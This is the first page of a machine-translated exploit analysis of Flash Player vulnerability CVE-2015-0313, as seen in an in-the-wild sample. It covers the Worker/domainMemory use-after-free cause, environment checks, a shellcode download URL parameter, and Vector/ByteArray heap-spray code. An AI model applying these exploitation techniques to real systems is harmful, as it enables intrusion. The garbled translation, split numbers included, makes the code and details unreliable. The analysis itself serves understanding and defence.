CVE-2 0 1 5-0 3 1 3:New Flash Exploit Analysis-exploit warning-the black bar safety net

ID MYHACK58:62201560580
Type myhack58
Reporter 佚名
Modified 2015-03-31T00:00:00


Overview Recently the Flash Player message coming out of many high hazard vulnerability, a time to fire up visual Flash will usher in a wave of climax. ! I also come to scrape together lively, here to share a Flash Vulnerability Exploit it! Exactly how not to engage in too flash, take the cve-2 0 1 5-0 3 1 3 to practice your hand. We still start the chase! Environment Vulnerability: cve-2 0 1 5-0 3 1 3 System: Windows 7 + IE11 + flash player version, this version and earlier versions will trigger the vulnerability Summary: the Exploit, ASLR,ROP,control EIP The vulnerability causes a brief The vulnerability is Trend Micro in 2 months when in the wild caught 0day, we can see here the trend of the vulnerability of the approximate analysis. First here a simple analysis of the vulnerability causes the front trend blog has also been mentioned. I will here mainly speak the vulnerability how to use. Worker: the In the analysis of the vulnerability before we first introduce the following in ActionScript 3.0 Worker, in simple terms, the Worker is then you run the main SWF, and then run another SWF program is not a bit like Multi-threading, so that there is a very important part is more between Workers to share data, so by the ByteArray. shareable attribute to achieve in the worker between the shared memory. The properties will be in between workers shared ByteArray data. Everyone can see here for more information. domainMemory: Everyone should know this attribute is used to specify the ApplicationDomain to perform global memory operations of objects, domainMemory inherit from ByteArray. Vulnerability causes: the The vulnerability occurs right at the worker and domainMemory. The vulnerability is triggered the process is as follows: 1)in the main worker in the Create a sub-worker, then the worker is shared between the ByteArray data 2)in the main worker in the shared ByteArray object is set to domainMemory 3)in the sub-worker by the ByteArray. Clear the shared ByteArray memory clear 4)but this time domainMemory still can reference the shared memory area, this is because the sub-worker to call clear to clear the memory of the time did not notify domainMemory to modify the shared references. This is a bug. Write to here believe that the heart of man has been able to construct their own poc. (Afraid Trojanspy technical details The previous analysis of the vulnerability to trigger reason, next we focus on the analysis of the sample is how to exploit the vulnerability. The samples use a lot of tricks to bypass anti-virus and to increase the analysis difficulty, here I will not speak of these, we definitely care more about is how to use the To determine the attack environment: Through the following code to get Flash Player version var loc7:String = Capabilities. version. toLowerCase(); If not a window,exit var loc6:String = loc7. substr(0,4); if(loc6 != "win ") { return 0; } And then for the Flash Player version number to judge var loc3:Boolean = this. var_13 >= 1 3 0 0 0 0 2 5 9 && this. var_13 1 4 0 0 0 0 0 0 0 || this. var_13 == 1 5 0 0 0 0 2 4 6 || this. var_13 >= 1 6 0 0 0 0 2 3 5; The above code in the 1 6 0 0 0 0 2 3 5 represents the version number 1 6. 0. 0. 2 3 5, If loc3 the result is flase then exit Download URL: The sample get javascript to pass the parameters to obtain the download URL loc14 = root. loaderInfo. parameters. exec; Then after a series of transformation to obtain the real URL, here is not tired After will put the encoded shellcode string in the form of writing a ByteArray The layout of the memory: Next, the exp begins to perform the most important step, by the Vector. To heap spray, the control of the memory layout, the similar code is as follows: this. var_48 = new Vector. Object>(0x1020); loc2 = 0; while(loc2 this. aNmlxJ) { loc16_ = new ByteArray(); loc16. endian = "littleEndian"; this. var_48[loc2] = loc16; loc2++; } Then just fill each of the Vector elements, the Exp with the ByteArray to fill the g_bt = new ByteArray(); g_bt. shareable = true; g_bt. endian = "littleEndian"; loc2 = 0; while(loc2 this. vecLength) { if(loc2 != 8 1 7) ; { loc16 =this. var_48[loc2] as ByteArray; loc16. length = 0x2000; wIntInByteArr(loc16,0xcccccccc); ;to a ByteArray written to 0xcccccccc loc16. writeInt(0xbabefac0); ;written to the tag loc16. writeInt(0xbabefac1); loc16. writeInt(loc2); loc16. writeInt(0xbabefac3); } else { g_bt. length = 0x2000; wIntInByteArr(g_bt,0x33333333); ;write 0x33333333 } loc2++; } Such as the codes shown in this. var_48[8 1 7] and there is no assigned instance of“instead”is g_bt:ByteArray, also assigned 0x2000 bytes in size. This time we can look at the memory layout in the case, but first we look under the ByteArray in-memory data structure. In the present embodiment g_bt object instance address is ab22581, but this is not really a memory address, this is because the AVM in the operation data, are based on the atom as the basic type, the address of the last 3 bits of a hundred village. the object pointer of the information. Untagged = 0 0 0 (0) Object = 0 0 1 (1) String = 0 1 0 (2)

[1] [2] [3] [4] [5] next